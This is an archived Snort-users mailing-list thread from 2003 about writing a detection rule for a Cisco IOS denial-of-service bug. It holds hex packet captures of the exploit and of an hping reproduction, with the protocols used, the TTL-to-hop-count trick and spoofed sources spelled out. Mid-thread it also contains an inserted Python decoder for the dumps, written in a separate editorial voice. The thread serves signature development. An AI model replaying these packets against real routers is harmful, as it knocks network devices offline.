[Snort-users] Anyone got a rule for the latest Cisco bug?

Matt Ploessel matt.ploessel at ...427...
Fri Jul 18 10:56:14 EDT 2003


Pat,

-----Forwarded Message-----
From: Keith Pachulski

Output below is from both the SC code and hping performing the same as
SC. Feel free to develop your signatures from it.

SC Exploit
11:59:59.014190 79.111.123.116 > dhcp9-1.noc.corp.ptd.net:  swipe 181
0x0000   4500 00c9 bf25 0000 0235 fe3b 4f6f 7b74        E....%...5.;Oo{t
0x0010   ccba 6301 0001 0203 0405 0607 0809 0a0b        ..c.............
0x0020   0c0d 0e0f 1011 1213 1415 1617 1819 1a1b        ................
0x0030   1c1d 1e1f 2021 2223 2425 2627 2829 2a2b        .....!"#$%&'()*+
0x0040   2c2d 2e2f 3031 3233 3435 3637 3839 3a3b        ,-./0123456789:;
0x0050   3c3d 3e3f 4041 4243 4445 4647 4849 4a4b        <=>?@ABCDEFGHIJK
0x0060   4c4d 4e4f 5051 5253 5455 5657 5859 5a5b        LMNOPQRSTUVWXYZ[
0x0070   5c5d 5e5f 6061 6263 6465 6667 6869 6a6b        \]^_`abcdefghijk
0x0080   6c6d 6e6f 7071 7273 7475 7677 7879 7a7b        lmnopqrstuvwxyz{
0x0090   7c7d 7e7f 8081 8283 8485 8687 8889 8a8b        |}~.............
0x00a0   8c8d 8e8f 9091 9293 9495 9697 9899 9a9b        ................
0x00b0   9c9d 9e9f a0a1 a2a3 a4a5 a6a7 a8a9 aaab        ................
0x00c0   acad aeaf b0b1 b2b3 b4                         .........
11:59:59.014402 dhcp9-1.noc.corp.ptd.net > 79.111.123.116: icmp:
dhcp9-1.noc.corp.ptd.net protocol 53 unreachable [tos 0xc0] 

0x0000   45c0 00e5 80f8 0000 4001 fdc0 ccba 6301        E.......@.....c.
0x0010   4f6f 7b74 0302 df39 0000 0000 4500 00c9        Oo{t...9....E...
0x0020   bf25 0000 0235 fe3b 4f6f 7b74 ccba 6301        .%...5.;Oo{t..c.
0x0030   0001 0203 0405 0607 0809 0a0b 0c0d 0e0f        ................
0x0040   1011 1213 1415 1617 1819 1a1b 1c1d 1e1f        ................
0x0050   2021 2223 2425 2627 2829 2a2b 2c2d 2e2f        .!"#$%&'()*+,-./
0x0060   3031 3233 3435 3637 3839 3a3b 3c3d 3e3f        0123456789:;<=>?
0x0070   4041 4243 4445 4647 4849 4a4b 4c4d 4e4f        @ABCDEFGHIJKLMNO
0x0080   5051 5253 5455 5657 5859 5a5b 5c5d 5e5f        PQRSTUVWXYZ[\]^_
0x0090   6061 6263 6465 6667 6869 6a6b 6c6d 6e6f        `abcdefghijklmno
0x00a0   7071 7273 7475 7677 7879 7a7b 7c7d 7e7f        pqrstuvwxyz{|}~.
0x00b0   8081 8283 8485 8687 8889 8a8b 8c8d 8e8f        ................
0x00c0   9091 9293 9495 9697 9899 9a9b 9c9d 9e9f        ................
0x00d0   a0a1 a2a3 a4a5 a6a7 a8a9 aaab acad aeaf        ................
0x00e0   b0b1 b2b3 b4                                   .....
11:59:59.014380 36.71.143.53 > dhcp9-1.noc.corp.ptd.net: mobile: [] 
(bad checksum 515)
0x0000   4500 00c9 fefc 0000 0237 d5c9 2447 8f35        E........7..$G.5
0x0010   ccba 6301 0001 0203 0405 0607 0809 0a0b        ..c.............
0x0020   0c0d 0e0f 1011 1213 1415 1617 1819 1a1b        ................
0x0030   1c1d 1e1f 2021 2223 2425 2627 2829 2a2b        .....!"#$%&'()*+
0x0040   2c2d 2e2f 3031 3233 3435 3637 3839 3a3b        ,-./0123456789:;
0x0050   3c3d 3e3f 4041 4243 4445 4647 4849 4a4b        <=>?@ABCDEFGHIJK
0x0060   4c4d 4e4f 5051 5253 5455 5657 5859 5a5b        LMNOPQRSTUVWXYZ[
0x0070   5c5d 5e5f 6061 6263 6465 6667 6869 6a6b        \]^_`abcdefghijk
0x0080   6c6d 6e6f 7071 7273 7475 7677 7879 7a7b        lmnopqrstuvwxyz{
0x0090   7c7d 7e7f 8081 8283 8485 8687 8889 8a8b        |}~.............
0x00a0   8c8d 8e8f 9091 9293 9495 9697 9899 9a9b        ................
0x00b0   9c9d 9e9f a0a1 a2a3 a4a5 a6a7 a8a9 aaab        ................
0x00c0   acad aeaf b0b1 b2b3 b4                         .........
11:59:59.014603 dhcp9-1.noc.corp.ptd.net > 36.71.143.53: icmp:
dhcp9-1.noc.corp.ptd.net protocol 55 unreachable [tos 0xc0] 

0x0000   45c0 00e5 5815 0000 4001 3e0b ccba 6301        E...X...@.>...c.
0x0010   2447 8f35 0302 df39 0000 0000 4500 00c9        $G.5...9....E...
0x0020   fefc 0000 0237 d5c9 2447 8f35 ccba 6301        .....7..$G.5..c.
0x0030   0001 0203 0405 0607 0809 0a0b 0c0d 0e0f        ................
0x0040   1011 1213 1415 1617 1819 1a1b 1c1d 1e1f        ................
0x0050   2021 2223 2425 2627 2829 2a2b 2c2d 2e2f        .!"#$%&'()*+,-./
0x0060   3031 3233 3435 3637 3839 3a3b 3c3d 3e3f        0123456789:;<=>?
0x0070   4041 4243 4445 4647 4849 4a4b 4c4d 4e4f        @ABCDEFGHIJKLMNO
0x0080   5051 5253 5455 5657 5859 5a5b 5c5d 5e5f        PQRSTUVWXYZ[\]^_
0x0090   6061 6263 6465 6667 6869 6a6b 6c6d 6e6f        `abcdefghijklmno
0x00a0   7071 7273 7475 7677 7879 7a7b 7c7d 7e7f        pqrstuvwxyz{|}~.
0x00b0   8081 8283 8485 8687 8889 8a8b 8c8d 8e8f        ................
0x00c0   9091 9293 9495 9697 9899 9a9b 9c9d 9e9f        ................
0x00d0   a0a1 a2a3 a4a5 a6a7 a8a9 aaab acad aeaf        ................
0x00e0   b0b1 b2b3 b4                                   .....
11:59:59.014572 57.21.62.14 > dhcp9-1.noc.corp.ptd.net:  nd 181
0x0000   4500 00c9 bcb9 0000 024d 5450 3915 3e0e        E........MTP9.>.
0x0010   ccba 6301 0001 0203 0405 0607 0809 0a0b        ..c.............
0x0020   0c0d 0e0f 1011 1213 1415 1617 1819 1a1b        ................
0x0030   1c1d 1e1f 2021 2223 2425 2627 2829 2a2b        .....!"#$%&'()*+
0x0040   2c2d 2e2f 3031 3233 3435 3637 3839 3a3b        ,-./0123456789:;
0x0050   3c3d 3e3f 4041 4243 4445 4647 4849 4a4b        <=>?@ABCDEFGHIJK
0x0060   4c4d 4e4f 5051 5253 5455 5657 5859 5a5b        LMNOPQRSTUVWXYZ[
0x0070   5c5d 5e5f 6061 6263 6465 6667 6869 6a6b        \]^_`abcdefghijk
0x0080   6c6d 6e6f 7071 7273 7475 7677 7879 7a7b        lmnopqrstuvwxyz{
0x0090   7c7d 7e7f 8081 8283 8485 8687 8889 8a8b        |}~.............
0x00a0   8c8d 8e8f 9091 9293 9495 9697 9899 9a9b        ................
0x00b0   9c9d 9e9f a0a1 a2a3 a4a5 a6a7 a8a9 aaab        ................
0x00c0   acad aeaf b0b1 b2b3 b4                         .........
11:59:59.014837 dhcp9-1.noc.corp.ptd.net > 57.21.62.14: icmp:
dhcp9-1.noc.corp.ptd.net protocol 77 unreachable [tos 0xc0] 

0x0000   45c0 00e5 8357 0000 4001 4f22 ccba 6301        E....W..@.O"..c.
0x0010   3915 3e0e 0302 df39 0000 0000 4500 00c9        9.>....9....E...
0x0020   bcb9 0000 024d 5450 3915 3e0e ccba 6301        .....MTP9.>...c.
0x0030   0001 0203 0405 0607 0809 0a0b 0c0d 0e0f        ................
0x0040   1011 1213 1415 1617 1819 1a1b 1c1d 1e1f        ................
0x0050   2021 2223 2425 2627 2829 2a2b 2c2d 2e2f        .!"#$%&'()*+,-./
0x0060   3031 3233 3435 3637 3839 3a3b 3c3d 3e3f        0123456789:;<=>?
0x0070   4041 4243 4445 4647 4849 4a4b 4c4d 4e4f        @ABCDEFGHIJKLMNO
0x0080   5051 5253 5455 5657 5859 5a5b 5c5d 5e5f        PQRSTUVWXYZ[\]^_
0x0090   6061 6263 6465 6667 6869 6a6b 6c6d 6e6f        `abcdefghijklmno
0x00a0   7071 7273 7475 7677 7879 7a7b 7c7d 7e7f        pqrstuvwxyz{|}~.
0x00b0   8081 8283 8485 8687 8889 8a8b 8c8d 8e8f        ................
0x00c0   9091 9293 9495 9697 9899 9a9b 9c9d 9e9f        ................
0x00d0   a0a1 a2a3 a4a5 a6a7 a8a9 aaab acad aeaf        ................
0x00e0   b0b1 b2b3 b4                                   .....
11:59:59.015060 43.53.57.126 > dhcp9-1.noc.corp.ptd.net: pim v0
0x0000   4500 00c9 2404 0000 0267 ff5b 2b35 397e        E...$....g.[+59~
0x0010   ccba 6301 0001 0203 0405 0607 0809 0a0b        ..c.............
0x0020   0c0d 0e0f 1011 1213 1415 1617 1819 1a1b        ................
0x0030   1c1d 1e1f 2021 2223 2425 2627 2829 2a2b        .....!"#$%&'()*+
0x0040   2c2d 2e2f 3031 3233 3435 3637 3839 3a3b        ,-./0123456789:;
0x0050   3c3d 3e3f 4041 4243 4445 4647 4849 4a4b        <=>?@ABCDEFGHIJK
0x0060   4c4d 4e4f 5051 5253 5455 5657 5859 5a5b        LMNOPQRSTUVWXYZ[
0x0070   5c5d 5e5f 6061 6263 6465 6667 6869 6a6b        \]^_`abcdefghijk
0x0080   6c6d 6e6f 7071 7273 7475 7677 7879 7a7b        lmnopqrstuvwxyz{
0x0090   7c7d 7e7f 8081 8283 8485 8687 8889 8a8b        |}~.............
0x00a0   8c8d 8e8f 9091 9293 9495 9697 9899 9a9b        ................
0x00b0   9c9d 9e9f a0a1 a2a3 a4a5 a6a7 a8a9 aaab        ................
0x00c0   acad aeaf b0b1 b2b3 b4                         .........
11:59:59.015239 dhcp9-1.noc.corp.ptd.net > 43.53.57.126: icmp:
dhcp9-1.noc.corp.ptd.net protocol 103 unreachable [tos 0xc0] 

0x0000   45c0 00e5 65bf 0000 4001 7f2a ccba 6301        E...e...@..*..c.
0x0010   2b35 397e 0302 df39 0000 0000 4500 00c9        +59~...9....E...
0x0020   2404 0000 0267 ff5b 2b35 397e ccba 6301        $....g.[+59~..c.
0x0030   0001 0203 0405 0607 0809 0a0b 0c0d 0e0f        ................
0x0040   1011 1213 1415 1617 1819 1a1b 1c1d 1e1f        ................
0x0050   2021 2223 2425 2627 2829 2a2b 2c2d 2e2f        .!"#$%&'()*+,-./
0x0060   3031 3233 3435 3637 3839 3a3b 3c3d 3e3f        0123456789:;<=>?
0x0070   4041 4243 4445 4647 4849 4a4b 4c4d 4e4f        @ABCDEFGHIJKLMNO
0x0080   5051 5253 5455 5657 5859 5a5b 5c5d 5e5f        PQRSTUVWXYZ[\]^_
0x0090   6061 6263 6465 6667 6869 6a6b 6c6d 6e6f        `abcdefghijklmno
0x00a0   7071 7273 7475 7677 7879 7a7b 7c7d 7e7f        pqrstuvwxyz{|}~.
0x00b0   8081 8283 8485 8687 8889 8a8b 8c8d 8e8f        ................
0x00c0   9091 9293 9495 9697 9899 9a9b 9c9d 9e9f        ................
0x00d0   a0a1 a2a3 a4a5 a6a7 a8a9 aaab acad aeaf        ................
0x00e0   b0b1 b2b3 b4                                   .....

HPING
11:56:40.024194 dhcp9-52.noc.corp.ptd.net > dhcp9-1.noc.corp.ptd.net: 
swipe 0
0x0000   4500 0014 9f64 0000 0235 b9a6 ccba 6334        E....d...5....c4
0x0010   ccba 6301 0000 0000 0000 0000 0000 0000        ..c.............
0x0020   0000 0000 0000 0000 0000 0000 0000             ..............
11:56:40.024731 dhcp9-1.noc.corp.ptd.net > dhcp9-52.noc.corp.ptd.net:
icmp: dhcp9-1.noc.corp.ptd.net protocol 53 unreachable [tos 0xc0] 

0x0000   45c0 0030 29df 0000 4001 f083 ccba 6301        E..0)...@.....c.
0x0010   ccba 6334 0302 fcfd 0000 0000 4500 0014        ..c4........E...
0x0020   9f64 0000 0235 b9a6 ccba 6334 ccba 6301        .d...5....c4..c.
11:57:26.534797 dhcp9-52.noc.corp.ptd.net > dhcp9-1.noc.corp.ptd.net: 
nd 0
0x0000   4500 0014 38fa 0000 024d 1ff9 ccba 6334        E...8....M....c4
0x0010   ccba 6301 0000 0000 0000 0000 0000 0000        ..c.............
0x0020   0000 0000 0000 0000 0000 0000 0000             ..............
11:57:26.534898 dhcp9-1.noc.corp.ptd.net > dhcp9-52.noc.corp.ptd.net:
icmp: dhcp9-1.noc.corp.ptd.net protocol 77 unreachable [tos 0xc0] 

0x0000   45c0 0030 29e1 0000 4001 f081 ccba 6301        E..0)...@.....c.
0x0010   ccba 6334 0302 fcfd 0000 0000 4500 0014        ..c4........E...
0x0020   38fa 0000 024d 1ff9 ccba 6334 ccba 6301        8....M....c4..c.
11:57:39.829722 dhcp9-52.noc.corp.ptd.net > dhcp9-1.noc.corp.ptd.net:
pim v0
0x0000   4500 0014 368f 0000 0267 224a ccba 6334        E...6....g"J..c4
0x0010   ccba 6301 0000 0000 0000 0000 0000 0000        ..c.............
0x0020   0000 0000 0000 0000 0000 0000 0000             ..............
11:57:39.829814 dhcp9-1.noc.corp.ptd.net > dhcp9-52.noc.corp.ptd.net:
icmp: dhcp9-1.noc.corp.ptd.net protocol 103 unreachable [tos 0xc0] 

0x0000   45c0 0030 29e2 0000 4001 f080 ccba 6301        E..0)...@.....c.
0x0010   ccba 6334 0302 fcfd 0000 0000 4500 0014        ..c4........E...
0x0020   368f 0000 0267 224a ccba 6334 ccba 6301        6....g"J..c4..c.
11:57:52.245620 dhcp9-52.noc.corp.ptd.net > dhcp9-1.noc.corp.ptd.net:
[|mobile]
0x0000   4500 0014 96be 0000 0237 c24a ccba 6334        E........7.J..c4
0x0010   ccba 6301 0000 0000 0000 0000 0000 0000        ..c.............
0x0020   0000 0000 0000 0000 0000 0000 0000             ..............
11:57:52.245699 dhcp9-1.noc.corp.ptd.net > dhcp9-52.noc.corp.ptd.net:
icmp: dhcp9-1.noc.corp.ptd.net protocol 55 unreachable [tos 0xc0] 

0x0000   45c0 0030 29e3 0000 4001 f07f ccba 6301        E..0)...@.....c.
0x0010   ccba 6334 0302 fcfd 0000 0000 4500 0014        ..c4........E...
0x0020   96be 0000 0237 c24a ccba 6334 ccba 6301        .....7.J..c4..c.

|Keith A. Pachulski, PPS, GCIH, GCFW | NSA IATF Member | FBI InfraGard Secure Member|
|PenTeleData/Prolog Internet Services | Information Security & Privacy|
|6B56 C8DC 6201 6D1A BFF5 5799 E193 ABAA 9549 74D0|
|"In God We Trust -- All Others We Monitor" --- United States Navy Intelligence|



...

Matt Ploessel
Network Security Engineer
Foundstone, Inc.
Strategic Security

949.297.5622 Tel 
949.297.5575 Fax 

http://www.foundstone.com
PGP: https://www.foundstone.com/pgpkeys/matt_ploessel.asc
PGP Hash: 5233 27A0 E504 2887 0F6F 0218 7495 1EB2 F182 E914

This email may contain confidential and privileged information for the
sole use of the intended recipient. Content disclosure to third parties
is strictly prohibited. Verify sender and message body authenticity
against the above PGP key only, retrieved via a secure and dependable
method. Thank you.
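Anyone turning the forwarded dumps into a signature first needs the IPv4 header fields back out of tcpdump's hex. The following is an added example, not code from the list or from Keith's or Matt's posts: it rebuilds raw bytes from `tcpdump -x` lines, verifies the IP header checksum, and reports the protocol number, TTL and payload length that the dumps show for the four protocols involved. The two sample dumps are copied from the message above (payload lines truncated); the function names are my own.

```python
import struct
# Constructed sample input: the IPv4 header lines of the first SC-exploit packet
# and of the first hping packet from the tcpdump -x output forwarded above.
SC_SWIPE = """\
0x0000   4500 00c9 bf25 0000 0235 fe3b 4f6f 7b74        E....%...5.;Oo{t
0x0010   ccba 6301 0001 0203 0405 0607 0809 0a0b        ..c.............
"""
HPING_SWIPE = """\
0x0000   4500 0014 9f64 0000 0235 b9a6 ccba 6334        E....d...5....c4
0x0010   ccba 6301 0000 0000 0000 0000 0000 0000        ..c.............
"""
# The four IP protocol numbers exercised in the dumps above.
WATCHED = {53: "swipe", 55: "mobile", 77: "nd", 103: "pim"}

def hexdump_to_bytes(dump: str) -> bytes:
    """Rebuild raw bytes from tcpdump -x lines ('0xNNNN  hhhh hhhh ...  ascii')."""
    out = bytearray()
    for line in dump.splitlines():
        parts = line.split()
        if len(parts) < 2 or not parts[0].startswith("0x"):
            continue
        for tok in parts[1:9]:  # at most eight 16-bit groups per line
            if len(tok) in (2, 4) and all(c in "0123456789abcdef" for c in tok):
                out += bytes.fromhex(tok)
            else:
                break           # reached the ASCII column
    return bytes(out)

def ipv4_checksum(header: bytes) -> int:
    """RFC 791 one's-complement sum over the header; 0 means the stored checksum is valid."""
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))  # IHL*4 is always even
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def inspect(pkt: bytes) -> dict:
    """Decode the fixed IPv4 header fields a signature writer needs from these dumps."""
    ihl = (pkt[0] & 0x0F) * 4
    total_len, ident, _flags, ttl, proto = struct.unpack("!HHHBB", pkt[2:10])
    return {
        "version": pkt[0] >> 4, "ihl": ihl, "id": ident, "ttl": ttl, "proto": proto,
        "name": WATCHED.get(proto),                    # None when not a watched protocol
        "src": ".".join(map(str, pkt[12:16])), "dst": ".".join(map(str, pkt[16:20])),
        "payload_len": total_len - ihl,                # tcpdump's 'swipe 181' / 'swipe 0'
        "header_csum_ok": ipv4_checksum(pkt[:ihl]) == 0,
        "watched": proto in WATCHED,                   # the condition a rule would key on
    }

if __name__ == "__main__":
    for label, dump in (("SC", SC_SWIPE), ("hping", HPING_SWIPE)):
        print(label, inspect(hexdump_to_bytes(dump)))
```

Both samples decode to protocol 53 with TTL 2, matching the thread's note that the TTL is tuned to the hop count; the SC packet carries 181 payload bytes where hping's carries none.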


> -----Original Message-----
> From: Donahue, Pat [mailto:PDonahue at ...9678...] 
> Sent: Friday, July 18, 2003 9:53 AM
> To: Erek Adams; Du Feu, Richard
> Cc: snort-users at lists.sourceforge.net
> Subject: RE: [Snort-users] Anyone got a rule for the latest Cisco bug?
> 
> 
> Speaking of which, has anyone been able to obtain a full 
> packet capture? There's probably not too much to those 184 
> bytes, but I'd be interested in seeing the payload as well as 
> the packet headers. Anyway, the simple fix seems to be as 
> always keeping your IOS up to date with the 12.3 branch.
> 
> --
> Patrick Donahue
> Network/Systems Administrator
> ACMI Corporation
> 
> -----Original Message-----
> From: Erek Adams [mailto:erek at ...950...]
> Sent: Friday, July 18, 2003 5:30 AM
> To: Du Feu, Richard
> Cc: snort-users at lists.sourceforge.net
> Subject: RE: [Snort-users] Anyone got a rule for the latest Cisco bug?
> 
> 
> On Fri, 18 Jul 2003, Du Feu, Richard wrote:
> 
> > I'm fairly new to snort and am not yet good at writing rules for it,
> > however I do have a packet capture of an attack against a Cisco
> > device. This is the exploit released on netssys. It looks roughly like
> > this:
> >
> > 09:45:29.846575 8.145.50.78 > a.b.c.d:  ip-proto-53 26 [ttl 1] (id 17168, len 46)
> > 09:45:29.846738 0.246.255.32 > a.b.c.d: mobile 0.246.255.32 > a.b.c.d: [] > 4.5.6.7 (oproto=0) (bad checksum 515) [ttl 1] (id 6925, len 46)
> > 09:45:29.846770 201.211.15.73 > a.b.c.d:  nd 26 [ttl 1] (id 38906, len 46)
> > 09:45:29.846795 61.81.217.4 > a.b.c.d: pim v0 [ttl 1] (id 8220, len 46)
> >
> > The ttl needs to be the number of hops to the target system. The
> > source IPs are spoofed. Is this enough for someone who is clued up to
> > write a rule for it?
> 
> It's something to start with, but it's not quite enough to 
> get a really good sig.  A "full" packet capture of the entire 
> packet would be the best thing.  Granted, these are small 
> packets but it's still nice to have. Besides, who doesn't 
> like to read hex?!?  :)
> 
> Cheers!
> 
> -----
> Erek Adams
> 
>    "When things get weird, the weird turn pro."   H.S. Thompson
> 
> 
> -------------------------------------------------------
> This SF.net email is sponsored by: VM Ware
> With VMware you can run multiple operating systems on a 
> single machine. WITHOUT REBOOTING! Mix Linux / Windows / 
> Novell virtual machines at the same time. Free trial click 
> here: http://www.vmware.com/wl/offer/345/0
> _______________________________________________
> Snort-users mailing list
> Snort-users at lists.sourceforge.net
> Go to this URL to change user options or unsubscribe: 
> https://lists.sourceforge.net/lists/listinfo/snort-users
> 
> Snort-users list archive: 
> http://www.geocrawler.com/redir-sf.php3?list=snort-users
> 



